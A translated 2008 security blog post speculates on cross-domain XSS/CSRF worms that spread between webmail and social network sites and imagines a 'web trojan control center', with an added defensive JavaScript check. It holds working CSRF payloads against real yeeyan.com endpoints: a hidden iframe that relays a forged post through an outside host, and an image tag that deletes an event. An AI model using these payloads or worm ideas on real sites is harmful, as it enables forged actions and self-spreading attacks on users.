On the existence of cross-domain worms
  Add date: 07/25/2008   Publishing date: 07/25/2008
 
Over the past few days I have analyzed XSS and CSRF vulnerabilities in several large websites, and I have also started to think about the question of cross-domain worms. After QZ decorated the clever page, I discovered a cross-domain bug under IE6; the impact of this discovery may go beyond simply stealing cookies :). I should mention, though, that the cross-domain worm discussed below has nothing to do with this bug; this article is purely speculative (YY).

An XSS worm cannot leave its SNS (social network) site, and its technical core is none other than the XMLHttpRequest object. I have written several SNS worms; if these worms could communicate with one another (overcoming their own inability to cross domains), the harm would be greater and things would be more interesting :). First we need to be clear about what a worm needs in order to survive in the Web x.0 world and how it reproduces (omitted). There are many ways to let worms communicate.

First, Mail-to-Mail Worm:

Mailboxes can send mail to one another, so a mail worm can use this to spread its payload (the XSS trap) across different mailbox services; of course, the payloads will then be almost entirely different. Take a sohu mail XSS worm and a QQ mail XSS worm: their communication channel can simply be the ability of the two services to send mail to each other. The worm's DOM logic will certainly differ between these two mail environments, but the basic functional modules can be shared, for instance the XMLHttpRequest object and some custom functions. Such a cross-domain worm basically needs the ability to determine which environment it is running in, which is very simple.

This is the simple model of a cross-domain worm.

Second, CSRF Worm:

This kind of cross-domain worm relies on a CSRF vulnerability. For instance, I set off an XSS worm on myspace.cn, and yeeyan.com has a very basic CSRF vulnerability; how can I carry the momentum on myspace over to yeeyan? At this point, code like the following could be added to the myspace.cn XSS worm:

<iframe src= http://www.0 * 37.com/Project/csrf/do.asp?csrf=http://www.yeeyan.com/groups/newTopic/&data [Post][content]=HI+CSRF:)&ymsggroup=&ymsgee=19076&ymsgee_username=19076 width=0 height=0></iframe>

If only a simple request needs to be sent, this is enough:

<img src= http://www.yeeyan.com/space/deleteEvent/15728 >

Suppose myspace.cn and yeeyan.com cooperate in some way, users frequently need the services both provide, and they are logged in to both SNS sites. Then, when myspace user A is infected by the XSS worm, a CSRF request is sent on behalf of yeeyan user B (A and B are the same person in the real world), and user B automatically posts a message on yeeyan. But what if this message is itself an XSS trap? Or a piece of CSRF lure content aimed at yeeyan.com? Ha-ha; as for how the worm reproduces, that is an art :).
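
A server-side check that refuses both request shapes shown above (the `<img>` GET and the relayed cross-site POST), as an added example that is not part of the original article. The function names, the trusted-origin list, the `csrf_token` field, the relay host `relay.example` and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: defensive checks, not code from the original article.
// Hypothetical names: TRUSTED_ORIGINS, checkRequest, session.csrfToken.
const TRUSTED_ORIGINS = new Set(["http://www.yeeyan.com"]);
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);
// Routes that change state; modelled on the two URLs quoted above.
const STATE_CHANGING = [/^\/space\/deleteEvent\/\d+$/, /^\/groups\/newTopic\/?$/];

// Constant-time string comparison so the token cannot be guessed via timing.
function safeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Origin of the page that issued the request: Origin header, else Referer.
function sourceOrigin(headers) {
  const raw = headers.origin || headers.referer;
  if (!raw) return null;
  try { return new URL(raw).origin; } catch (e) { return null; }
}

function checkRequest(req, session) {
  const changesState = STATE_CHANGING.some((re) => re.test(req.path));
  if (!changesState) return "allow";
  // 1. An <img src=...> can only issue GET, so never mutate on a safe method.
  if (SAFE_METHODS.has(req.method)) return "reject: state change over " + req.method;
  // 2. A form or iframe hosted on another site carries that site's origin.
  const origin = sourceOrigin(req.headers);
  if (!origin || !TRUSTED_ORIGINS.has(origin)) return "reject: untrusted origin";
  // 3. Per-session token that a page on another origin cannot read.
  if (!safeEqual(req.body.csrf_token, session.csrfToken)) return "reject: bad token";
  return "allow";
}

// Constructed sample requests; the victim's session cookie rides along on all.
const session = { csrfToken: "constructed-token-3f9a" };
const samples = {
  imgGet: { method: "GET", path: "/space/deleteEvent/15728",
            headers: { referer: "http://myspace.cn/profile" }, body: {} },
  relayedPost: { method: "POST", path: "/groups/newTopic/",
            headers: { origin: "http://relay.example" }, body: { content: "HI CSRF:)" } },
  ownForm: { method: "POST", path: "/groups/newTopic/",
            headers: { origin: "http://www.yeeyan.com" },
            body: { content: "hello", csrf_token: "constructed-token-3f9a" } },
};
for (const [name, req] of Object.entries(samples)) console.log(name, "->", checkRequest(req, session));
```

These checks stop only the cross-site hop: script running through an XSS flaw on the same site can read the token, so the XSS itself still has to be fixed.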

Third, web trojan control center:

I have mentioned this concept before. Such a control center should not be limited to trojan-planting applications: independent Web 2.0 worms need a control center, which ensures that worms with no original relationship to one another can communicate. The web trojan control center is the key intermediary in this communication :). The control center should also provide real-time control over both web trojans and Web 2.0 worms. This already exists, but it is not yet very complete. I have said that developing such a control center requires combining complex server-side technologies. This has already become a trend of development.

 